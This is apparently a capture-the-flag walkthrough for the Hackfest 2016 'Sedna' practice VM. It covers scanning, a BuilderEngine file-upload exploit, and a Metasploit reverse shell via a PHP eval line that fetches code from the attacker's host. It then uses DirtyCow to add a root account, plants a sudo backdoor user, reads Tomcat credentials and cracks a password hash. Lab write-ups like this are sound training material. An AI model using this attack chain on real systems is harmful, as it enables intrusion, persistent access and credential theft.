
Hi everyone, I did the first Vuln VM from hackfest 2016 not long ago and i want to try this one now. It’s the second one by @ViperBlackSkull and it is the second walkthrough for me so if you need more information you can reach me on twitter at @marghost. You can get the virtual machine HERE. So lets get started.
First of all let’s make a quick nmap and a nikto. i had already made those so i will just copy my note file. (Always open a notepad when you are hacking it is the best advice i can give to you)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_Hackers |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 38749/udp status |_ 100024 1 53495/tcp status 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: | Supported Methods: GET HEAD POST PUT DELETE OPTIONS |_ Potentially risky methods: PUT DELETE |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat | smb-os-discovery: | OS: Unix (Samba 4.1.6-Ubuntu) | NetBIOS computer name: SEDNA | Workgroup: WORKGROUP |_ System time: 2017-03-17T15:38:30-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server supports SMBv2 protocol 80 + "robots.txt" contains 1 entry which should be manually viewed. + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3268: /files/: Directory indexing found. + OSVDB-3092: /files/: This might be interesting... + OSVDB-3092: /system/: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-3092: /license.txt: License file found may identify site software. 8080 + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + /: Appears to be a default Apache Tomcat install. + /examples/servlets/index.html: Apache Tomcat default JSP pages present. + OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. + /manager/html: Default Tomcat Manager / Host Manager interface found + /host-manager/html: Default Tomcat Manager / Host Manager interface found + /manager/status: Default Tomcat Server Status interface found
Ok so here we see many things. First of all we have two web server, one samba server that can maybe be exploited, also a rpc server that may be used for unbound connection to the server and of course an ssh.
I tried first to find an exploit for the rpc server but i had no luck, metasploit had exploit to ddos or crash it, and other exploits required nfs. I turn myself to the web servers. The 80 one have a robot file that is no use. I skip to the 8080 and tried to poke around tomcat, need to be auth to use main exploit and the default username:password did not work. I tried to bruteforce the password with the tomcat_mgr_login auxiliary scan from metasploit and noting to be found.
So i put my attention into the 80 server there is noting interesting into the /files/ directory. The system and user directories are locked down… The readme of icon directory is noting but usefull. I found someting interesting into the license.txt the site use builderengine. A quick google search pointed out that i can exploit this to send a reverse php shell.
So first of all need to create the builderengine.php file that will send malicious code into the /files/ directory of the remote server.
<!-- # Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0 # Date: 18/09/2016 # Exploit Author: metanubix # Vendor Homepage: http://builderengine.org/ # Software Link: http://builderengine.org/page-cms-download.html # Version: 3.5.0 # Tested on: Kali Linux 2.0 64 bit # Google Dork: intext:"BuilderEngine Ltd. All Right Reserved" 1) Unauthenticated Unrestricted File Upload: POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ Vulnerable Parameter: files[] We can upload test.php and reach the file via the following link: /files/test.php --> <html> <body> <form method="post" action="http://192.168.1.16/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data"> <input type="file" name="files[]" /> <input type="submit" value="send" /> </form> </body> </html>
After that start php server and open the builderengine.php that you just created.
php -S 127.0.0.1:80
Start metasploit and insert the right commands to start a web_delivery exploit
use exploit/multi/script/web_delivery set target 1 set lhost 192.168.1.14 set payload php/meterpreter/reverse_tcp run
When you will run the exploit it will give you an adress, just create a remotexploit.php file and fill it like this :
<?php eval(file_get_contents('http://192.168.1.14:8080/9HL33yWdUR4KFo')); ?>
Now use the delivery form to upload this little php gift from metasploit. Then you will be prompted by metasploit to open a session
sessions -i 1
python -c 'import pty; pty.spawn("/bin/bash")'
Done i have a shell! First win.
A quick view tell me that this linux kernel is vulnerable to the Dirty Dirty Cow exploit
www-data@Sedna:/var/www$ uname -a uname -a Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
curl https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c <githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4805 100 4805 0 0 29333 0 --:--:-- --:--:-- --:--:-- 29478 www-data@Sedna:/var/www/html/files$ gcc -pthread dirty.c -o dirty -lcrypt gcc -pthread dirty.c -o dirty -lcrypt www-data@Sedna:/var/www/html/files$ ./dirty ./dirty Please enter the new password: test /etc/passwd successfully backed up to /tmp/passwd.bak Complete line: firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash mmap: b77cc000 ptrace 0 Done! Check /etc/passwd to see if the new user was created You can log in with username firefart and password test. DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!! /etc/passwd successfully backed up to /tmp/passwd.bak Complete line: firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash mmap: b77cc000 madvise 0 Done! Check /etc/passwd to see if the new user was created You can log in with username firefart and password test. DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!! 192.168.1.16 - Meterpreter session 1 closed. Reason: Died
When exploited, ruuuun to ssh and login as fast as you can. You are on the edge as dirty cow is unstable as FU** and can cause a kernel panic anytime. To make it stable you need to enter a line of code.
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
It should look like this :
root@kali:~# ssh firefart@192.168.1.19 firefart@192.168.1.19's password: Added user firefart. Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686) * Documentation: https://help.ubuntu.com/ System information as of Mon Mar 20 08:25:24 EDT 2017 System load: 0.15 Memory usage: 2% Processes: 57 Usage of /: 29.7% of 7.26GB Swap usage: 0% Users logged in: 0 Graph this data and manage this system at: https://landscape.canonical.com/ Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126 firefart@Sedna:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs firefart@Sedna:~# id uid=0(firefart) gid=0(root) groups=0(root) firefart@Sedna:~# adduser pwned Adding user `pwned' ... Adding new group `pwned' (1001) ... Adding new user `pwned' (1001) with group `pwned' ... Creating home directory `/home/pwned' ... Copying files from `/etc/skel' ... no talloc stackframe at ../source3/param/loadparm.c:4864, leaking memory Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully Changing the user information for pwned Enter the new value, or press ENTER for the default Full Name []: Room Number []: Work Phone []: Home Phone []: Other []: Is the information correct? [Y/n] firefart@Sedna:~# usermod -aG sudo pwned
As you can see here the line of code is pushed right after the ssh login and i make a root user right after just in case something goes wrong.
I am groot! It’s another win :p
Now we go fishing for flags. Found the two first flags the easy way by making a search as root :
firefart@Sedna:/# find . -name "flag.txt" ./var/www/flag.txt ./root/flag.txt firefart@Sedna:/# cat /var/www/flag.txt bfbb7e6e6e88d9ae66848b9aeac6b289 firefart@Sedna:/# cat /root/flag.txt a10828bee17db751de4b936614558305 firefart@Sedna:/#
Ok now i need to find the two post exploit flags. My first reflex was to go and investigate the /files/users/ directory of the 80 server…
this was a dead end. Next ting to snoop in was the tomcat install that i was not able to login even if i tried to bruteforce the password.
so a little google search pointed me that tomcat passwords are inside ‘/etc/tomcat7/tomcat-users.xml’
This is what i found
<role rolename="manager-gui"/> <user username="tomcat" password="submitthisforpoints" roles="manager-gui"/> </tomcat-users>
Looks like i found a flag!
Now it is time to login into the tomcat server. Noting to be found there.
I snooped a little more around. noting to see from running process (ps -aux | less).
No special cron was used. (/etc/crontab)
I found it!!! an user named crackmeforpoints is inside the user list (cut -d: -f1 /etc/passwd)
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::
so i will try to john my way to this password over night… almost done!
root@kali:~/Downloads# john ./crack.password.db</pre> Created directory: /root/.john Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Press 'q' or Ctrl-C to abort, almost any other key for status
Ok after a night John the crazy didn’t crack the password so it is a little more complex that I as expected. I got the flag and the job is done for me :). Have a nice day and I will send you in the next walkthrough.
M.